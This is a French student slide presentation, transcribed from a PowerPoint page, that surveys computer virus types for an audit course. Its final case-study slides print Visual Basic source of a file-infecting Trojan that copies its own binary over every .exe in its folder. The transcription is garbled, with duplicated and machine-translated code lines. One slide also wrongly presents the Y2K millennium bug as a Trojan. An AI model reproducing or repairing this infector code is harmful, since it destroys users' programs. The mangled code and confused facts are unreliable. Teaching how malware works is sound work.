Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

25
Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2 Travail réalisé par: AMARA Mohamed Mehdi MEJRI Firas MOHAMED Marwa RABEH Zied WESLETI Emna

description

Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2. Travail réalisé par: AMARA Mohamed Mehdi MEJRI Firas MOHAMED Marwa RABEH Zied WESLETI Emna. Introduction. Définition d’un virus informatique:  logiciel malveillant s’insérant dans des logiciels légitimes (hôtes). - PowerPoint PPT Presentation

Transcript of Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

Page 1: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

Projet d’outils de l’audit

Sujet: Types de virus

Groupe: M2SSICE G2

Travail réalisé par:

AMARA Mohamed MehdiMEJRI FirasMOHAMED MarwaRABEH ZiedWESLETI Emna

Page 2: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

2

Introduction

Définition d’un virus informatique: logiciel malveillant s’insérant dans des

logiciels légitimes (hôtes). Propagation à travers tout moyen

d’échange de données numériques

Virus informatique vers informatique

Page 3: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

3

Types de virus (1/2) Type de propagation :

- les virus furtifs - les virus compagnons - les virus souterrains - les virus polymorphes - les virus cavité - les virus blindés - les virus compte gouttes - les bombes ANSI

Page 4: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

4

Types de virus (2/2) Vitesse de propagation:

- les infecteurs normaux - les infecteurs rapides - les infecteurs lents - les infecteurs occasionnels - les vers informatiques - les chevaux de Troie - les macro virus

Page 5: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

5

Les virus furtifs Dissimuler des modifications apportées aux

fichiers ou aux secteurs boot.

Duper les antivirus données saines lors de l'analyse

Exemple: virus systèmes et virus applications (brain, frodo .. )

Page 6: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

6

Les virus compagnons

Créer un fichier copie ayant le même nom du fichier victime.

Exécuter la version copie infectée au  premier lieu.

Indétectable par les vérificateurs d’intégrité. 

Page 7: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

7

Les virus souterrains

Appeler directement des vecteurs d'interruptions DOS et BIOS .

Détecter certains virus inconnus et non-détectables.

Page 8: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

8

Les virus polymorphes

Produire des copies variées opérationnelles de lui-même.

Présenter différentes copies pour ne pas pouvoir détecter toutes les variantes .

Modifier sa représentation lors du réplication.

Page 9: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

9

Les virus cavité

Ecraser une partie du fichier hôte contenant des constantes (généralement les 0).

Ne pas augmenter la taille du fichier.

Préserver la fonctionnalité du fichier.

Page 10: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

10

Les virus blindés

Utiliser des astuces spéciales pour ne pas comprendre son code.

Utiliser des ruses techniques pour durcir son désassemblage.

Page 11: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

11

Les infecteurs

Les infecteurs rapides : infecter les programmes exécutés et ouverts.

Les infecteurs lents : infecter les fichiers modifiés ou crées.

Page 12: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

12

Les vers Informatiques Programme complet n’a pas besoin de

programmes hôtes.

Vers de stations de travail : contenu dans le système (lapin)

Vers de réseaux : segment principal coordonnant les actions des autres segments (pieuvres)

Page 13: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

13

Les virus compte gouttes

Mécanisme d’injection de code du virus dans le code d’un programme.

Elargissement de la taille du code du virus lors de l’exécution du programme.

Page 14: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

14

Les macro virus

Spécifiques à l’infection des documents non des programmes.

Consacrés au version de systèmes d’exploitation (DOS, Macintosh).

Exemple: Concept, Wazzu, Npad, Cap

Page 15: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

15

Les infecteurs occasionnels

Infection de manière irrégulière en réduisant la probabilité d’être découvert.

Un mécanisme basé sur la fréquence d’infection

Page 16: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

16

Les bombes ANSI

Utiliser des Techniques de reprogrammation d'un clavier utilisé en mode console ANSI.

Exemple: Readme ANSI Bomb, Die ANSI Bomb…

Page 17: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

17

Les infecteurs normaux

Infecter le programme ciblé en parallèle avec l’exécution de ce virus

Exemple: Jerusalem

Page 18: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

18

Les chevaux de Troie

Trojan Horse : logiciel d’apparence légitime, conçu pour exécuter des actions à l’insu de l'utilisateur.

Se propager facilement à d’autres programmes.

Exemple: Back Orifice, Y3k Rat …

Page 19: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

19

Exemple: Etude de cas pratique(0/5)

Analyse fonctionnelle du virus y2k:

Y2K (Y pour year, 2K pour 2000) fut le sigle américain le plus couramment employé pour désigner le problème d’un cheval de troie.

Le terme millennium bug (« bogue du millénaire ») a aussi été utilisé aux États-Unis.

Sur certains ordinateurs, le programme crashe avant de faire des dommages mais sur d´autres, il prétendra réparer des problèmes de l´An 2000 sur votre ordinateur alors qu´il réécrit le disque dur.

Page 20: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

20

Exemple: Etude de cas pratique(1/5)

Mode de fonctionnement du virus y2k (code source):

- Définition des variables:

Option Explicit Option Explicit Dim myarray() As Byte myarray Dim () As Byte  Dim victim As String victime Dim As StringConst mysize As Integer = 11776 mysize Const As Integer = 11776

Page 21: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

21

Exemple: Etude de cas pratique(2/5)

- Initialisation:

Private Sub Form_Load() Private Sub Form_Load () On Error Resume Next On Error Resume NextDim Free Dim gratuitFree = FreeFile Free = FreeFile

Page 22: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

22

Exemple: Etude de cas pratique(3/5)

- Extraire le code binaire de notre virus et le stocker dans la variable myaray: :

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As Free //Free Open App.Path & "\" & App.EXEName & ". Exe" pour l'accès binaire 

ReDim myarray(mysize) ReDim MonTableau (mysize) //obtenir myarray

Get 1, 1,Close Free

Page 23: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

23

Exemple: Etude de cas pratique(4/5)

- Définir la variable victime et mettre le code binaire dans le programme cible :

victim = Dir(App.Path & "\" & "*.EXE") victime = Dir (App.Path & "\" & "*. exe")

While victim <> "" Bien que victime <> ""

Open App.Path & "\" & victim For Binary Access Write As Free //pour l’accès binaire

 Put 1, , myarray //mettre le code binaire dans le programme de la victime

Put 1, , mysizeClose Free

Page 24: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

24

Exemple: Etude de cas pratique(5/5)

- Mise à zéro de la victime et répétition de l'ensemble du processus d'infection de tous les fichiers « .exe » dans le répertoire courant:

victim = Dir() victime = Dir () Wend Wend - Fermeture du programme et des sous

dossiers:

End EndEnd Sub End Sub

Page 25: Projet d’outils de l’audit Sujet: Types de virus Groupe: M2SSICE G2

25

Merci pour votre attention